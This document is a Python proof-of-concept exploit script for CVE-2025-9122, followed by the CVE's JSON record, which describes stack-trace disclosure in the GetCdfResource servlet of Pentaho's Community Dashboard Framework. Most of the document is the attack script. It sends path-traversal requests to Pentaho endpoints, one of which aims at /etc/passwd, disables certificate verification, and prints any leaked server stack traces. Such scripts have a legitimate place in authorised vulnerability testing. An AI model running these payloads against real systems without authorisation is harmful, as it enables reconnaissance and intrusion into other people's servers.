CVE-2025-9122

import requests import sys # CVE-2025-9122 PoC - Information Disclosure in GetCdfResource servlet # Target: Hitachi Vantara Pentaho Community Dashboard Framework def exploit(target_url): """ Exploit script to trigger error disclosure in GetCdfResource servlet """ endpoints = [ "/pentaho/content/common-ui/resources/web/../../../GetCdfResource", "/pentaho/api/repositories/GetCdfResource", "/pentaho/plugin/GetCdfResource?resource=/../../../invalid", "/pentaho/content/pentaho-cdf-dd/GetCdfResource?path=../../../../etc/passwd" ] print(f"[*] Testing target: {target_url}") print("[*] CVE-2025-9122 - Information Disclosure in GetCdfResource\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: print(f"[+] Testing: {endpoint}") response = requests.get(url, timeout=10, verify=False) # Check for stack trace indicators if any(indicator in response.text for indicator in [ 'java.lang.', 'at java.', 'Exception', 'Stacktrace', 'at org.pentaho', 'at com.pentaho', '.java:' ]): print(f"[!] VULNERABLE - Stack trace detected!") print(f"[+] Response length: {len(response.text)} bytes") # Extract first 500 chars of stack trace if 'java.lang' in response.text: start = response.text.find('java.lang') print(f"[+] Stack trace snippet:\n{response.text[start:start+500]}") return True else: print(f"[-] No information disclosure detected") except requests.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com/pentaho") sys.exit(1) exploit(sys.argv[1])

{"cve": {"id": "CVE-2025-9122", "sourceIdentifier": "[email protected]", "published": "2025-12-15T23:15:57.737", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hitachi Vantara Pentaho Data Integration and Analytics Community Dashboard Framework prior to versions 10.2.0.4, including 9.3.0.x and 8.3.x display the full server stack trace when encountering an error within the GetCdfResource servlet."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}]}], "references": [{"url": "https://support.pentaho.com/hc/en-us/articles/41833799577741--Resolved-Hitachi-Vantara-Pentaho-Business-Analytics-Server-Generation-of-Error-Message-Containing-Sensitive-Information-Versions-before-10-2-0-4-Impacted-CVE-2025-9122", "source": "[email protected]"}]}}